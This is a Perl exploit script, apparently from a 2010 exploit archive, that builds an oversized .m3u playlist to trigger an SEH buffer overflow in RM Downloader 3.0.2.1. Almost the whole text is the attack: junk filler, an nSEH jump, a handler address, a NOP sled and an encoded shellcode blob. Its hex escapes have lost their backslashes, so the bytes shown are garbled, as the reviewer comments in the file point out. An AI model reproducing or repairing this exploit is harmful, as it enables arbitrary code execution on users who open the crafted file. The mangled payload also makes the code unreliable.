# Title : RM Downloader .m3u BOF (SEH)
# Published : 2010-01-19
# Author : Jacky
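#!/usr/bin/perl -w
# Author: Jacky
# Version: 3.0.2.1
# Tested on: Windows XP SP2
#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
#Written by Jacky
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct
#Ret Vulnerability , so i tried by SEH and Voila !
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!
use strict;
use warnings;

# Output playlist: one oversized entry that the header above reports
# RM Downloader mishandles while parsing the .m3u (SEH-based overflow).
my $file = "RM.m3u";

# Layout of the generated content, in order:
#   $junk  - filler up to the SEH record
#   $nseh  - next-SEH slot
#   $seh   - SEH handler slot (address taken from the original author's notes)
#   $nops  - padding
#   $esp   - encoded payload stage
#   $junk2 - trailing filler
# NOTE(review): as this page renders them, the "x.." sequences below carry no
# backslashes, so Perl treats them as the literal characters x, e, b, ...
# rather than as byte escapes; the text looks mangled in extraction. They are
# reproduced byte-for-byte here, as is the trailing "n" in the two print
# strings (which likewise lacks its backslash and so prints no newline).
my $junk  = "A" x 35059;
my $nseh  = "xebx1ex90x90";
my $seh   = "x1FxEAx02x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
#address and it worked Perfectly ;-)
#This Address works too ::> 0x01DD1111
my $nops  = "x90" x 25;
my $esp   = "xbfx1bxafxd9xd2x2bxc9xb1x24xdbxdaxd9x74x24xf4x5b"
          . "x31x7bx0ex83xebxfcx03x60xa5x3bx27x6ax51xffxc8x92"
          . "xa2x8bx8cxaex29xf7x0bxb6x2cxe7x9fx09x37x7cxc0xb5"
          . "x46x69xb6x3ex7cxe6x48xaex4cx38xd3x82x2bx78x90xdd"
          . "xf2xb3x54xe0x36xa8x93xd9xe2x0bx58x68xeexdfx3fxb6"
          . "xf1x34xd9x3dxfdx81xadx1exe2x14x59x2bx06x9cx9cxc0"
          . "xbexfexbax12x02xcfx02x7ex0fx70xb3xfbxcfx09xbfx88"
          . "x90xe5x34xfex0cx5bxc1x96x24x48xdfxedxb5x3exe0xf1"
          . "xb5xb5x89xcdxeaxf8xbfx4dx43x72xc7x0exabxffx68x78"
          . "xdcx8ax8dx27x74x13x73x5dx8ax74x73x86xf0x1bxe7x2b"
          . "xd9xbex8fxcex25";
my $junk2 = "A" x 5000;
my $payload = $junk . $nseh . $seh . $nops . $esp . $junk2;

# Three-arg open with an explicit mode and an error check: the original
# two-arg form (">$file") ignored failure silently, and a two-arg open lets
# mode characters inside the filename change how the file is opened.
open my $out, '>', $file or die "[-]Cannot open $file for writing: $!";
print {$out} $payload;
# Buffered write errors only surface at close, so check it before reporting
# success (the original printed the success message before closing).
close $out or die "[-]Cannot close $file: $!";
print "[+]File Created Successfully!n";
print "[+]Done!n";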